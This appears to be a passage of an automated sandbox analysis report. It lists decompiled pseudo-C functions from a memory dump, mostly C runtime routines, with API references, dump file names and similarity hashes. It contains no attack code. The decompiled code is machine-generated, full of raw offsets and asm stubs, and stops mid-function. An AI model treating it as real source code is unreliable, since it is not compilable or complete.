                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 002FC4F3
                                              • RegisterClassExW.USER32 ref: 002FC507
                                              • CreateWindowExW.USER32 ref: 002FC536
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: BrushClassColorCreateRegisterWindow
                                              • String ID: 0$SAVEBOXCLASS
                                              • API String ID: 4191210197-2426242092
                                              • Opcode ID: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction ID: d72286a97e308a44f03ceadae57f97fbe2c9e182a024b2b7abe425f39409cddb
                                              • Opcode Fuzzy Hash: 108b436e078b864566325f8a4348c78ad8a32f0d04c11a570a94d9aeb92a2868
                                              • Instruction Fuzzy Hash: 900181B4A80308BBFB109F90EC4AFAEBB74AB04B14F004125FB147A2C0D7F01614CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002), ref: 002F2EB0
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002F2EC3
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,002F2E41,00000003,?,002F2DE1,00000003,00302E60,0000000C,002F2F38,00000003,00000002,00000000), ref: 002F2EE6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction ID: 07f7f2434e329cbd8d30b1d3cb5b761a2a893577e36cb5a14272e31944ed56ba
                                              • Opcode Fuzzy Hash: 5c649f52ed6c3203a98318a1b517c7364a73057f365f33bbef307f7eec96961c
                                              • Instruction Fuzzy Hash: DAF0813191111DBBDF129F91DC0DBBEBFA8EF04791F020078EA06A2160DB705E64CA91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 81%
                                              			E002F5BAB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                              				signed int _v8;
                                              				int _v12;
                                              				char _v16;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				void* _v40;
                                              				signed int _t34;
                                              				signed int _t40;
                                              				int _t46;
                                              				int _t53;
                                              				void* _t55;
                                              				int _t57;
                                              				signed int _t63;
                                              				int _t67;
                                              				short* _t69;
                                              				signed int _t70;
                                              				short* _t71;
                                              
                                              				_t34 =  *0x304018; // 0xbb40e64e
                                              				_v8 = _t34 ^ _t70;
                                              				E002F3784(__ebx,  &_v28, __edx, _a4);
                                              				_t57 = _a24;
                                              				if(_t57 == 0) {
                                              					_t53 =  *(_v24 + 8);
                                              					_t57 = _t53;
                                              					_a24 = _t53;
                                              				}
                                              				_t67 = 0;
                                              				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                              				_v12 = _t40;
                                              				if(_t40 == 0) {
                                              					L15:
                                              					if(_v16 != 0) {
                                              						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                              					}
                                              					return E002F19D1(_v8 ^ _t70);
                                              				}
                                              				_t55 = _t40 + _t40;
                                              				_t17 = _t55 + 8; // 0x8
                                              				asm("sbb eax, eax");
                                              				if((_t17 & _t40) == 0) {
                                              					_t69 = 0;
                                              					L11:
                                              					if(_t69 != 0) {
                                              						E002F1D00(_t67, _t69, _t67, _t55);
                                              						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                              						if(_t46 != 0) {
                                              							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                              						}
                                              					}
                                              					L14:
                                              					E002F5CC8(_t69);
                                              					goto L15;
                                              				}
                                              				_t20 = _t55 + 8; // 0x8
                                              				asm("sbb eax, eax");
                                              				_t48 = _t40 & _t20;
                                              				_t21 = _t55 + 8; // 0x8
                                              				_t63 = _t21;
                                              				if((_t40 & _t20) > 0x400) {
                                              					asm("sbb eax, eax");
                                              					_t69 = E002F3696(_t63, _t48 & _t63);
                                              					if(_t69 == 0) {
                                              						goto L14;
                                              					}
                                              					 *_t69 = 0xdddd;
                                              					L9:
                                              					_t69 =  &(_t69[4]);
                                              					goto L11;
                                              				}
                                              				asm("sbb eax, eax");
                                              				E002FA3A0();
                                              				_t69 = _t71;
                                              				if(_t69 == 0) {
                                              					goto L14;
                                              				}
                                              				 *_t69 = 0xcccc;
                                              				goto L9;
                                              			}
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 002F5BF8
                                              • __alloca_probe_16.LIBCMT ref: 002F5C30
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002F5C81
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 002F5C93
                                              • __freea.LIBCMT ref: 002F5C9C
                                                • Part of subcall function 002F3696: HeapAlloc.KERNEL32(00000000,?,00000004,?,002F381C,?,00000000,?,002F60CD,?,00000004,00000000,?,?,?,002F3361), ref: 002F36C8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                              • String ID:
                                              • API String ID: 1857427562-0
                                              • Opcode ID: 2b551d529bdb79effc09e9558004a8b6875dbd4263f407aaec222af3efea058d
                                              • Instruction ID: b9b839e41c67eb9019fc458c797dbe0ee4b36f643feb935d798e018a001ab979
                                              • Opcode Fuzzy Hash: 2b551d529bdb79effc09e9558004a8b6875dbd4263f407aaec222af3efea058d
                                              • Instruction Fuzzy Hash: BB31E272A2061EABCF258F64DC85DBEBBA5EB40790F050139FE06D6250E735CD60CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 95%
                                              			E002F5044(signed int _a4) {
                                              				signed int _t9;
                                              				void* _t13;
                                              				signed int _t15;
                                              				WCHAR* _t22;
                                              				signed int _t24;
                                              				signed int* _t25;
                                              				void* _t27;
                                              
                                              				_t9 = _a4;
                                              				_t25 = 0x305620 + _t9 * 4;
                                              				_t24 =  *_t25;
                                              				if(_t24 == 0) {
                                              					_t22 =  *(0x2fed58 + _t9 * 4);
                                              					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                              					if(_t27 != 0) {
                                              						L8:
                                              						 *_t25 = _t27;
                                              						if( *_t25 != 0) {
                                              							FreeLibrary(_t27);
                                              						}
                                              						_t13 = _t27;
                                              						L11:
                                              						return _t13;
                                              					}
                                              					_t15 = GetLastError();
                                              					if(_t15 != 0x57) {
                                              						_t27 = 0;
                                              					} else {
                                              						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                              						_t27 = _t15;
                                              					}
                                              					if(_t27 != 0) {
                                              						goto L8;
                                              					} else {
                                              						 *_t25 = _t15 | 0xffffffff;
                                              						_t13 = 0;
                                              						goto L11;
                                              					}
                                              				}
                                              				_t4 = _t24 + 1; // 0xbb40e64f
                                              				asm("sbb eax, eax");
                                              				return  ~_t4 & _t24;
                                              			}

                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue), ref: 002F5076
                                              • GetLastError.KERNEL32(?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000,00000364,?,002F3CB4), ref: 002F5082
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,002F4FEB,00000000,00000000,00000000,00000000,?,002F51E8,00000006,FlsSetValue,002FF210,002FF218,00000000), ref: 002F5090
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction ID: 92fd3b9d13aa167ed9e78f9f316cf23fc3ce3dcedf4195c300ef6a34c55a3585
                                              • Opcode Fuzzy Hash: 833d66b15a193f527897590db42c51858bdd78ff7dd5a149a7736da26a1fdee8
                                              • Instruction Fuzzy Hash: EF01DD31621A3BABCB314E68AC48D76B758EF097F17110538FB05D3250DE60D810C6E1
                                              Uniqueness
                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 72%
                                              			E002F3BE2(void* __ebx, void* __ecx, void* __edx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				intOrPtr _t2;
                                              				void* _t3;
                                              				void* _t4;
                                              				intOrPtr _t9;
                                              				void* _t11;
                                              				void* _t20;
                                              				void* _t21;
                                              				void* _t23;
                                              				void* _t25;
                                              				void* _t27;
                                              				void* _t29;
                                              				void* _t31;
                                              				void* _t32;
                                              				long _t36;
                                              				long _t37;
                                              				void* _t40;
                                              
                                              				_t29 = __edx;
                                              				_t23 = __ecx;
                                              				_t20 = __ebx;
                                              				_t36 = GetLastError();
                                              				_t2 =  *0x304044; // 0xffffffff
                                              				_t42 = _t2 - 0xffffffff;
                                              				if(_t2 == 0xffffffff) {
                                              					L2:
                                              					_t3 = E002F3727(_t23, 1, 0x364);
                                              					_t31 = _t3;
                                              					_pop(_t25);
                                              					if(_t31 != 0) {
                                              						_t4 = E002F51C1(_t25, _t36, __eflags,  *0x304044, _t31);
                                              						__eflags = _t4;
                                              						if(_t4 != 0) {
                                              							E002F3A54(_t25, _t31, 0x3058fc);
                                              							E002F365C(0);
                                              							_t40 = _t40 + 0xc;
                                              							__eflags = _t31;
                                              							if(_t31 == 0) {
                                              								goto L9;
                                              							} else {
                                              								goto L8;
                                              							}
                                              						} else {
                                              							_push(_t31);
                                              							goto L4;
                                              						}
                                              					} else {
                                              						_push(_t3);
                                              						L4:
                                              						E002F365C();
                                              						_pop(_t25);
                                              						L9:
                                              						SetLastError(_t36);
                                              						E002F36E4(_t20, _t29, _t31, _t36);
                                              						asm("int3");
                                              						_push(_t20);
                                              						_push(_t36);
                                              						_push(_t31);
                                              						_t37 = GetLastError();
                                              						_t21 = 0;
                                              						_t9 =  *0x304044; // 0xffffffff
                                              						_t45 = _t9 - 0xffffffff;
                                              						if(_t9 == 0xffffffff) {
                                              							L12:
                                              							_t32 = E002F3727(_t25, 1, 0x364);
                                              							_pop(_t27);
                                              							if(_t32 != 0) {
                                              								_t11 = E002F51C1(_t27, _t37, __eflags,  *0x304044, _t32);
                                              								__eflags = _t11;
                                              								if(_t11 != 0) {
                                              									E002F3A54(_t27, _t32, 0x3058fc);
                                              									E002F365C(_t21);
                                              									__eflags = _t32;
                                              									if(_t32 != 0) {
                                              										goto L19;
                                              									} else {
                                              										goto L18;
                                              									}
                                              								} else {
                                              									_push(_t32);
                                              									goto L14;
                                              								}
                                              							} else {
                                              								_push(_t21);
                                              								L14:
                                              								E002F365C();
                                              								L18:
                                              								SetLastError(_t37);
                                              							}
                                              						} else {
                                              							_t32 = E002F516B(_t25, _t37, _t45, _t9);
                                              							if(_t32 != 0) {
                                              								L19:
                                              								SetLastError(_t37);
                                              								_t21 = _t32;
                                              							} else {
                                              								goto L12;
                                              							}
                                              						}
                                              						return _t21;
                                              					}
                                              				} else {
                                              					_t31 = E002F516B(_t23, _t36, _t42, _t2);
                                              					if(_t31 != 0) {
                                              						L8:
                                              						SetLastError(_t36);
                                              						return _t31;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              			}

                                              APIs
                                              • GetLastError.KERNEL32(?,?,002F3631,00302EE8,0000000C,002F1767), ref: 002F3BE6
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C4E
                                              • SetLastError.KERNEL32(00000000), ref: 002F3C5A
                                              • _abort.LIBCMT ref: 002F3C60
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ErrorLast$_abort
                                              • String ID:
                                              • API String ID: 88804580-0
                                              • Opcode ID: 991166d25cf3f46f78e685355dbfa6e2e9d966112505bbe977e42ee2c1d51edb
                                              • Instruction ID: fd68f21a4895db3324e63b5639dc0b848790f6fba8b2d7fa8b8003bbf98aeb51
                                              • Opcode Fuzzy Hash: 991166d25cf3f46f78e685355dbfa6e2e9d966112505bbe977e42ee2c1d51edb
                                              • Instruction Fuzzy Hash: 31F0D676120A0AA6D612B6247D09B3BE6698BC1BF4B210036F704F22A2DE61CA258964
                                              Uniqueness
                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F1CB6() {
                                              				void* _t4;
                                              				void* _t8;
                                              
                                              				E002F2317();
                                              				E002F22AB();
                                              				if(E002F2028() != 0) {
                                              					_t4 = E002F1FDA(_t8, __eflags);
                                              					__eflags = _t4;
                                              					if(_t4 != 0) {
                                              						return 1;
                                              					} else {
                                              						E002F2064();
                                              						goto L1;
                                              					}
                                              				} else {
                                              					L1:
                                              					return 0;
                                              				}
                                              			}

                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 002F1CB6
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 002F1CBB
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 002F1CC0
                                                • Part of subcall function 002F2028: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 002F2039
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 002F1CD5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction ID: e13ba2afff98d71b560222bd782f45c3bf61d84a0700566cab0a4c4e6d071c33
                                              • Opcode Fuzzy Hash: 42cfafaaf29d4f7fdf202ad325c91aa28037371ee4c1ad4e7deb3511513870bf
                                              • Instruction Fuzzy Hash: FEC0021907035ED46C243AB126521BDD34018733C57D125FAAB5116513CE06083F9D3B
                                              Uniqueness
                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F5D65(intOrPtr _a4) {
                                              				intOrPtr _v8;
                                              				intOrPtr _t25;
                                              				intOrPtr* _t26;
                                              				intOrPtr _t28;
                                              				intOrPtr* _t29;
                                              				intOrPtr* _t31;
                                              				intOrPtr* _t45;
                                              				intOrPtr* _t46;
                                              				intOrPtr* _t47;
                                              				intOrPtr* _t55;
                                              				intOrPtr* _t70;
                                              				intOrPtr _t74;
                                              
                                              				_t74 = _a4;
                                              				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                              				if(_t25 != 0 && _t25 != 0x304648) {
                                              					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                              					if(_t45 != 0 &&  *_t45 == 0) {
                                              						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                              						if(_t46 != 0 &&  *_t46 == 0) {
                                              							E002F365C(_t46);
                                              							E002F58DF( *((intOrPtr*)(_t74 + 0x88)));
                                              						}
                                              						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                              						if(_t47 != 0 &&  *_t47 == 0) {
                                              							E002F365C(_t47);
                                              							E002F59DD( *((intOrPtr*)(_t74 + 0x88)));
                                              						}
                                              						E002F365C( *((intOrPtr*)(_t74 + 0x7c)));
                                              						E002F365C( *((intOrPtr*)(_t74 + 0x88)));
                                              					}
                                              				}
                                              				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                              				if(_t26 != 0 &&  *_t26 == 0) {
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                              					E002F365C( *((intOrPtr*)(_t74 + 0x8c)));
                                              				}
                                              				E002F5ED8( *((intOrPtr*)(_t74 + 0x9c)));
                                              				_t28 = 6;
                                              				_t55 = _t74 + 0xa0;
                                              				_v8 = _t28;
                                              				_t70 = _t74 + 0x28;
                                              				do {
                                              					if( *((intOrPtr*)(_t70 - 8)) != 0x304638) {
                                              						_t31 =  *_t70;
                                              						if(_t31 != 0 &&  *_t31 == 0) {
                                              							E002F365C(_t31);
                                              							E002F365C( *_t55);
                                              						}
                                              						_t28 = _v8;
                                              					}
                                              					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                              						_t29 =  *((intOrPtr*)(_t70 - 4));
                                              						if(_t29 != 0 &&  *_t29 == 0) {
                                              							E002F365C(_t29);
                                              						}
                                              						_t28 = _v8;
                                              					}
                                              					_t55 = _t55 + 4;
                                              					_t70 = _t70 + 0x10;
                                              					_t28 = _t28 - 1;
                                              					_v8 = _t28;
                                              				} while (_t28 != 0);
                                              				return E002F365C(_t74);
			}

                                              APIs
                                                • Part of subcall function 002F365C: HeapFree.KERNEL32(00000000,00000000,?,002F5A74,?,00000000,?,00000000,?,002F5A9B,?,00000007,?,?,002F5EFD,?), ref: 002F3672
                                                • Part of subcall function 002F365C: GetLastError.KERNEL32(?,?,002F5A74,?,00000000,?,00000000,?,002F5A9B,?,00000007,?,?,002F5EFD,?,?), ref: 002F3684
                                              • ___free_lconv_mon.LIBCMT ref: 002F5DA9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ErrorFreeHeapLast___free_lconv_mon
                                              • String ID: 8F0$HF0
                                              • API String ID: 4068849827-2950912386
                                              • Opcode ID: 3752bdbabc9508bf07a257bc0ca522179c00157becba33b8887bb72f1882c1be
                                              • Instruction ID: c4c10656abceea773cf93d2080b577f3bf94c9bab60131a56e5109b4f2af68f0
                                              • Opcode Fuzzy Hash: 3752bdbabc9508bf07a257bc0ca522179c00157becba33b8887bb72f1882c1be
                                              • Instruction Fuzzy Hash: 01318F72510A5DAFEB60AE38D845B76F7E9AF00390F10443AE359D7651DB30EE60CB18
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E002F19D1(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {
                                              
                                              				asm("repne jnz 0x5");
                                              				asm("repne ret");
                                              				asm("repne jmp 0x2e");
                                              				SetUnhandledExceptionFilter(0);
                                              				UnhandledExceptionFilter(_a4);
                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 002F1A15
                                              • ___raise_securityfailure.LIBCMT ref: 002F1AFC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: pN0
                                              • API String ID: 3761405300-3818120037
                                              • Opcode ID: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction ID: 0d308b0168ceff8ee4c472d712f4ffead926be543852b325115c94fc1546d034
                                              • Opcode Fuzzy Hash: 1376b22b2c3dc03725c937f12aaf92870e445229900fb4f1b52e78d1e4a0790b
                                              • Instruction Fuzzy Hash: 232112F551220ADFD712DF68FA62615BBACFB48350F11412BEB088B3B0E7B45A91CB41
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 83%
                                              			E002F4B54(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                              				signed int _t15;
                                              				intOrPtr _t20;
                                              				void* _t24;
                                              				signed int _t25;
                                              				void* _t29;
                                              				intOrPtr _t30;
                                              				void* _t31;
                                              				void* _t36;
                                              
                                              				_t28 = __edx;
                                              				_t24 = __ecx;
                                              				_t23 = __ebx;
                                              				E002F17D0(__edx, 0x302f88, 0xc);
                                              				_t30 = 0;
                                              				 *((intOrPtr*)(_t31 - 0x1c)) = 0;
                                              				_t29 = E002F3BE2(__ebx, _t24, __edx);
                                              				_t25 =  *0x304698; // 0xfffffffe
                                              				if(( *(_t29 + 0x350) & _t25) == 0 ||  *((intOrPtr*)(_t29 + 0x4c)) == 0) {
                                              					L5:
                                              					_t15 = E002F4F49(5);
                                              					 *((intOrPtr*)(_t31 - 4)) = _t30;
                                              					_t30 =  *((intOrPtr*)(_t29 + 0x48));
                                              					 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
                                              					_t36 = _t30 -  *0x304570; // 0x304350
                                              					if(_t36 != 0) {
                                              						if(_t30 != 0) {
                                              							asm("lock xadd [esi], eax");
                                              							if((_t15 | 0xffffffff) == 0 && _t30 != 0x304350) {
                                              								E002F365C(_t30);
                                              							}
                                              						}
                                              						_t20 =  *0x304570; // 0x304350
                                              						 *((intOrPtr*)(_t29 + 0x48)) = _t20;
                                              						_t30 =  *0x304570; // 0x304350
                                              						 *((intOrPtr*)(_t31 - 0x1c)) = _t30;
                                              						asm("lock inc dword [esi]");
                                              					}
                                              					 *((intOrPtr*)(_t31 - 4)) = 0xfffffffe;
                                              					E002F4BE5();
                                              					goto L3;
                                              				} else {
                                              					_t30 =  *((intOrPtr*)(_t29 + 0x48));
                                              					L3:
                                              					if(_t30 != 0) {
                                              						return E002F1816(_t28);
                                              					}
                                              					E002F36E4(_t23, _t28, _t29, _t30);
                                              					goto L5;
                                              				}
			}

                                              APIs
                                                • Part of subcall function 002F3BE2: GetLastError.KERNEL32(?,?,002F3631,00302EE8,0000000C,002F1767), ref: 002F3BE6
                                                • Part of subcall function 002F3BE2: SetLastError.KERNEL32(00000000), ref: 002F3C5A
                                                • Part of subcall function 002F3BE2: _abort.LIBCMT ref: 002F3C60
                                              • _abort.LIBCMT ref: 002F4B86
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ErrorLast_abort
                                              • String ID: PC0$PC0
                                              • API String ID: 933726692-674614334
                                              • Opcode ID: 10ae758bfebf6d1f1c51dd2b1adbc4d7cee4463b9b36fab71d7e04eaa51009be
                                              • Instruction ID: 36d1503e3a46c5763524d2eb4ae405ea23d5b722b09c6ef532d5cc1e2563faa9
                                              • Opcode Fuzzy Hash: 10ae758bfebf6d1f1c51dd2b1adbc4d7cee4463b9b36fab71d7e04eaa51009be
                                              • Instruction Fuzzy Hash: F201A975D2162A9BC722BF68D85173AF364BB047A4B150236E75463282C7B0AA728FC5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 53%
                                              			E018CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                              				void* _t7;
                                              				intOrPtr _t9;
                                              				intOrPtr _t10;
                                              				intOrPtr* _t12;
                                              				intOrPtr* _t13;
                                              				intOrPtr _t14;
                                              				intOrPtr* _t15;
                                              
                                              				_t13 = __edx;
                                              				_push(_a4);
                                              				_t14 =  *[fs:0x18];
                                              				_t15 = _t12;
                                              				_t7 = E0187CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                              				_push(_t13);
                                              				E018C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                              				_t9 =  *_t15;
                                              				if(_t9 == 0xffffffff) {
                                              					_t10 = 0;
                                              				} else {
                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                              				}
                                              				_push(_t10);
                                              				_push(_t15);
                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                              				return E018C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018CFDFA
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018CFE01
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018CFE2B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 19486b5f69366f4d91e49d849f9ef96c949b28d11eafcc232ad46024697e4562
                                              • Instruction ID: 8c3367f50a679f9f1a756d35001e7a0fe2eda918559bb154e23914ca4e5c59d4
                                              • Opcode Fuzzy Hash: 19486b5f69366f4d91e49d849f9ef96c949b28d11eafcc232ad46024697e4562
                                              • Instruction Fuzzy Hash: 5FF0FC32200101BFEA211A49DC05F237F5BDB44B30F144318F724961D1DA72FA6086F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FCA50(intOrPtr _a4) {
                                              				struct %anon38 _v40;
